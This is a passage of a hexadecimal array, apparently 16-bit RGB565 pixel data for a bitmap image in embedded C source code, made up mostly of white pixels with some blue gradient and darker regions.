0x2cdb, 0x3d3c, 0x459c, 0x4dfd, 0x563d, 0x5e5d, 0x5e7d, 0x669e, 0x6e9e, 0x769e, 0x7e9e, 0x7e7d, 0x7e7d, 0x7e7d, 0x7e9d, 0x7e9d, 0x7e9d, 0x769d, 0x769d, 0x6e7d, 0x6e7d, 0x667d, 0x5e3d, 0x561d, 0x4dfd, 0x45bc, 0x3d9c, 0x353c, 0x2d1c, 0x24fc, 0x1cdc, 0x1c9b, 0x2459, 0x23f7, 0x13f8, 0x13d8, 0x23b6, 0x226c, 0x1924, 0x7c2f, 0xf7ff, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7be, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7be, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xb5b7, 0x94d4, 0xa619, 0xae3a, 0xae5a, 0xae7c, 0x9e3c, 0xa65c, 0x9df9, 0xae19, 0x7c52, 0xd6dc, 0xffff, 0xffff, 0xf77c, 0x5b0c, 0x5bb1, 0x32f0, 0x1bb5, 0x1bd6, 0x2417, 0x2478, 0x2cda, 0x351b, 0x459d, 0x4ddd, 0x561d, 0x5e5d, 0x667d, 0x669d, 0x6e9d, 0x769e, 0x7e9e, 0x7e9e, 0x869e, 0x869e, 0x869e, 0x7e9d, 0x86be, 0x7ebe, 0x7ebd, 0x7ebd, 0x769d, 0x6e9d, 0x6e7d, 0x5e5d, 0x563d, 0x561d, 0x45fd, 0x45bc, 0x3d5b, 0x353b, 0x2d3b, 0x1cfc, 0x1cbb, 0x2479, 0x2417, 0x1c19, 0x13f9, 0x23b6, 0x224c, 0x18e4, 0x7bf0, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xc638, 0x4a69, 0x6b4d, 0x6b6d, 0x6b6d, 0x632c, 0x6b4d, 0x6b4d, 0x632c, 0x6b4d, 0x6b4d, 0x6b4d, 0x6b4d, 0x6b4d, 0x6b4d, 0x6b4d, 0x6b4d, 0x6b4d, 0x6b4d, 0x6b4d, 0x6b4d, 0x6b4d, 0x6b4d, 0x6b4d, 0x6b6d, 0x6b6d, 0x6b6d, 0x6b6d, 0x6b4d, 0x6b4d, 0x6b4d, 0x632c, 0x5aeb, 0x94b2, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x9d15, 0x73d0, 0x6495, 0x6c95, 0x6474, 0x64b6, 0x6d39, 0x6cf8, 0x74f6, 0x7cd4, 0x6bf1, 0xdefd, 0xffdf, 0xffdf, 0xf75c, 0x52eb, 0x5390, 0x32f0, 0x23d5, 0x23f6, 0x2437, 0x2c99, 0x34fa, 0x3d5c, 0x4dbd, 0x55fd, 0x5e3d, 0x667d, 0x669d, 0x6e9d, 0x76bd, 0x7ebd, 0x7e9e, 0x869e, 0x869f, 0x7e9f, 0x7e9e, 0x7ebe, 0x7ebf, 0x7ebe, 0x7ebe, 0x76be, 0x6e9e, 0x6e9e, 0x669e, 0x5e7e, 0x565e, 0x4e3e, 0x461d, 0x45dd, 0x3d9a, 0x357a, 0x2d5c, 0x1d1c, 0x1cdb, 0x2479, 0x2438, 0x1419, 0x0bf9, 0x23b7, 0x224d, 0x18c4, 0x7bd0, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe71c, 0x2104, 0xd6ba, 0xe71c, 0xdefb, 0xe73c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xe71c, 0xdefb, 0xdefb, 0xe73c, 0xe73c, 0xdefb, 0x39c7, 0xe71c, 0xffff, 0xffdf, 0xffff, 0xffff, 0x73ae, 0x4a69, 0x52aa, 0x4208, 0x8c51, 0xc618, 0xad75, 0x9cf3, 0x9cf3, 0xad75, 0xf79e, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x7c10, 0x5aec, 0x5b2e, 0x5b2e, 0x5b2e, 0x73f1, 0x7c53, 0x7412, 0x6bd1, 0x6baf, 0x52cc, 0xd6dc, 0xffff, 0xffff, 0xf79d, 0x52cb, 0x5370, 0x3330, 0x1bd6, 0x2416, 0x2c78, 0x2cb9, 0x351a, 0x3d7b, 0x4dfc, 0x563d, 0x665e, 0x6e7e, 0x6e9e, 0x769e, 0x769e, 0x76be, 0x7ebe, 0x7ede, 0x7ede, 0x7ebe, 0x7ebe, 0x7ebe, 0x7ebe, 0x7ede, 0x7ebe, 0x7ebe, 0x76be, 0x6e9e, 0x667e, 0x667e, 0x5e5e, 0x563e, 0x4e1d, 0x45dd, 0x3ddc, 0x357b, 0x353b, 0x24fc, 0x1cdc, 0x1cbb, 0x1459, 0x1439, 0x0bf9, 0x23b6, 0x224d, 0x08a3, 0x7bef, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xef5d, 0x7bcf, 0x7bce, 0x0841, 0x18c4, 0x2946, 0x0821, 0x0000, 0x0001, 0x0041, 0x0020, 0x0020, 0x0042, 0x0023, 0x0023, 0x0042, 0x0041, 0x0040, 0x1003, 0x1001, 0x1020, 0x0800, 0x1063, 0x0022, 0x0862, 0x0041, 0x0060, 0x0061, 0x0021, 0x3a49, 0x3a29, 0x3a08, 0x2145, 0x632d, 0xcdf8, 0xd63a, 0xffbf, 0xfffe, 0xfffd, 0xbdf4, 0x0800, 0x1021, 0x1000, 0x0840, 0x3a06, 0x8c90, 0x9d12, 0x9d12, 0xa553, 0x73ce, 0xb5b6, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x7bf0, 0x52cb, 0x4acd, 0x52ed, 0x52cc, 0x6bb0, 0x73f1, 0x6390, 0x636f, 0x634e, 0x4a6b, 0xd6bb, 0xffff, 0xffff, 0xef7c, 0x4aaa, 0x4b4f, 0x3330, 0x23f6, 0x2437, 0x2c78, 0x34d9, 0x3d3a, 0x457c, 0x4dfd, 0x561d, 0x663e, 0x665e, 0x6e7e, 0x769e, 0x769e, 0x769e, 0x76be, 0x76be, 0x7ebe, 0x7ebe, 0x7ebe, 0x7ebe, 0x7ede, 0x7ede, 0x7ebe, 0x76be, 0x769e, 0x6e9e, 0x667e, 0x5e5e, 0x5e3e, 0x561d, 0x45fd, 0x45dd, 0x35bc, 0x355b, 0x353b, 0x24fc, 0x1cdc, 0x1cba, 0x1458, 0x1438, 0x13f8, 0x23b6, 0x224c, 0x08a2, 0x7bee, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe73c, 0x632c, 0xa598, 0x530f, 0x5b50, 0x4b2f, 0x5b90, 0x5b4f, 0x6350, 0x532e, 0x5b6e, 0x42cb, 0x42ed, 0x4ace, 0x4acf, 0x3a6b, 0x42cc, 0x3a8b, 0x426d, 0x3a4c, 0x3a4b, 0x428c, 0x322b, 0x320b, 0x21ca, 0x322b, 0x322a, 0x29e9, 0x29a9, 0x2168, 0x2989, 0x29a9, 0x10a5, 0x630f, 0xbdb7, 0xd65a, 0xffff, 0xf7ff, 0xf7ff, 0xadb5, 0x0000, 0x1043, 0x1044, 0x1063, 0x0040, 0x6bad, 0x9d14, 0x94b4, 0x8c93, 0x7c0f, 0xad75, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x7bf0, 0x52ab, 0x4aac, 0x4aac, 0x4aac, 0x636f, 0x6bb0, 0x636f, 0x5b2e, 0x5b0d, 0x4249, 0xd6ba, 0xffff, 0xffff, 0xf77c, 0x4aaa, 0x4b4f, 0x3310, 0x23f6, 0x2c17, 0x2c78, 0x34d9, 0x3d3a, 0x459c, 0x4dfd, 0x561d, 0x5e5e, 0x665e, 0x6e7e, 0x767e, 0x769e, 0x769e, 0x76be, 0x76be, 0x76be, 0x7ebe, 0x7ebe, 0x7ebe, 0x7ebe, 0x7ebe, 0x7e9e, 0x769d, 0x767d, 0x6e7d, 0x665d, 0x5e3d, 0x561d, 0x4dfd, 0x45dd, 0x45bc, 0x359c, 0x355b, 0x2d1b, 0x24fc, 0x1cdc, 0x1cba, 0x1c38, 0x1418, 0x13f8, 0x23b5, 0x222c, 0x0882, 0x7bee, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe73c, 0x5acb, 0xceff, 0x959b, 0x8d9b, 0x95db, 0x8d79, 0x8d18, 0x7c77, 0x7c76, 0x6c74, 0x8557, 0x6c95, 0x7496, 0x6c14, 0x84d7, 0x6454, 0x5c13, 0x5393, 0x5bf4, 0x53b2, 0x4b71, 0x4b92, 0x6c76, 0x5bd4, 0x32af, 0x4b71, 0x6c34, 0x4b10, 0x428f, 0x4ab0, 0x4a6f, 0x31cc, 0x7bd4, 0xadb7, 0xce9a, 0xf7ff, 0xf7ff, 0xf7ff, 0xadb6, 0x0882, 0x5aad, 0x4a8e, 0x3a0b, 0x3a09, 0x638e, 0x8473, 0x7c34, 0x8c74, 0x8c51, 0xad75, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x7bf0, 0x4aab, 0x4acc, 0x4aab, 0x4a8b, 0x636e, 0x6b8f, 0x5b4e, 0x5b0d, 0x5aec, 0x4229, 0xd69a, 0xffff, 0xffff, 0xf79d, 0x4a8a, 0x430e, 0x330f, 0x23f6, 0x2c37, 0x2c78, 0x34d9, 0x3d1a, 0x3d7b, 0x45bc, 0x4dfd, 0x5e3d, 0x665d, 0x665d, 0x6e7d, 0x6e9d, 0x6e9e, 0x6e9d, 0x76be, 0x769e, 0x769e, 0x769e, 0x769e, 0x769e, 0x769e, 0x767d, 0x6e5d, 0x6e5d, 0x663d, 0x5e1d, 0x55fd, 0x4ddd, 0x4dbc, 0x3d9c, 0x3d7c, 0x2d5d, 0x2d1b, 0x2cfc, 0x1cdc, 0x14bb, 0x1c7a, 0x1c18, 0x1bf8, 0x13d8, 0x23b5, 0x222b, 0x0861, 0x73ce, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xef5d, 0x5aeb, 0xcede, 0x9d9a, 0xa5fb, 0x9599, 0x84f7, 0x6bd3, 0x73f5, 0x5bb3, 0x74b5, 0xbf3f, 0xd7bf, 0x63f4, 0x7cb7, 0x21eb, 0x016a, 0x4c15, 0x53b3, 0xc73f, 0x2a4e, 0x5393, 0x6435, 0x2a8f, 0x5bf5, 0x3af1, 0x6c77, 0x00a7, 0x3aaf, 0x42d1, 0x4ad2, 0x4271, 0x320e, 0x6bd5, 0xb5f7, 0xce9a, 0xffff, 0xf7ff, 0xf7ff, 0xad95, 0x0882, 0x31c7, 0x21c6, 0x21c6, 0x3208, 0x3a09, 0x1104, 0x1124, 0x1925, 0x18c6, 0xad35, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x73cf, 0x4a8a, 0x4aab, 0x426a, 0x4249, 0x632d, 0x5b4e, 0x5b0d, 0x52cc, 0x52ab, 0x39e8, 0xd69a, 0xffff, 0xffff, 0xf77c, 0x4249, 0x3aed, 0x3310, 0x2416, 0x2437, 0x2c78, 0x2cd9, 0x351a, 0x355b, 0x3d9c, 0x45bc, 0x4e1d, 0x561d, 0x5e5d, 0x5e5d, 0x665d, 0x667d, 0x667d, 0x667d, 0x6e7e, 0x6e7e, 0x6e7e, 0x6e7d, 0x6e7d, 0x6e5d, 0x663d, 0x663d, 0x663d, 0x5e1d, 0x55fd, 0x4dbc, 0x459c, 0x3d7c, 0x355b, 0x351b, 0x2cfd, 0x2cbc, 0x249b, 0x1c7b, 0x147b, 0x1439, 0x1bd8, 0x1bb8, 0x13b8, 0x2396, 0x1a0c, 0x0041, 0x73ce, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xef5d, 0x5acb, 0xdedc, 0xc63a, 0xc65b, 0xbe19, 0xad77, 0x7390, 0x8413, 0x8cd6, 0xb69b, 0x6c52, 0xae1a, 0x6bf3, 0x8475, 0x7454, 0x7d17, 0x5434, 0x6bd3, 0x7414, 0x6bd3, 0x6392, 0x63d2, 0x63d3, 0x6c15, 0x4af1, 0x5332, 0x3a8e, 0x5bb2, 0x42d0, 0x4af2, 0x4291, 0x3a6f, 0x6c14, 0xadb6, 0xce7a, 0xffff, 0xfffd, 0xfffd, 0x9cd2, 0x6b6d, 0xdf9a, 0xcfd7, 0xc797, 0xcf1b, 0xd71d, 0xd79a, 0xc776, 0xd779, 0xb5b9, 0x9cf3, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 